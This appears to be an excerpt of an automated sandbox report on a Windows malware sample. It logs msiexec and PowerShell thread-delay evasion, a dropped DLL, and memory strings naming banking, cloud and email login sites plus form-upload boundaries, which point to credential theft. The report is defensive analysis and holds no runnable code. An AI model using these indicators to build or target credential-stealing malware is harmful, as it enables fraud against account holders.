Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599206	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598736	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598621	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597529	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596323	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596082	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595967	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595633	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594437	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6058			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3636			Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8128	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6660	Thread sleep count: 8117 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6660	Thread sleep count: 1737 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599206s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598736s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598621s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597858s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597529s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597202s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596435s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596323s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596217s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -596082s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595967s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595633s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920	Thread sleep time: -594437s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405841
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00406393 FindFirstFileW,FindClose,	0_2_00406393

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599206	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598736	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598621	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597529	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596323	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596082	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595967	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595633	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594437	Jump to behavior

Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2582024062.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd32ae06876375P
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd3282708daf7e<
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
